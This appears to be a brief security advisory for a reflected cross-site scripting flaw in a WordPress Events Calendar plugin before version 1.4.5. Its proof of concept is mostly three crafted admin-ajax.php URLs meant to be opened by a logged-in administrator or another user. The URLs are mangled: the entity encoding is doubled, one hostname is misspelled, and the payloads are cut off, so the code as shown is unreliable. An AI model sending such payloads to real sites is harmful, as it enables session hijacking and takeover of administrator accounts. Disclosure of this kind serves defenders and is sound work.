WordPress Events Calendar Plugin < 1.4.5 - Multiple Reflected XSS

The plugin does not sanitize and escapes a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against both unauthenticated and authenticated users (such as high-privilege ones like admin).

PoC

1. Create a new calendar in the plugin’s settings page (most payloads below require at least one calendar to exist) Attack: Make any unauthenticated or authenticated user (such as an admin) open one of the URLs below: 1. https://exmple.com/wp-admin/admin-ajax.php?action=cdaily&amp;subaction;=cd_displayday&amp;callback;=1&amp;bymethod;=&amp;by;_id=/../../../../../../r%26_=--&gt; 2. https://example.com/wp-admin/admin-ajax.php?action=cdaily&amp;subaction;=cd_calendar&amp;id;=XX"> 3. https://example.com/wp-admin/admin-ajax.php?action=cdaily&amp;subaction;=cd_dismisshint&amp;callback;=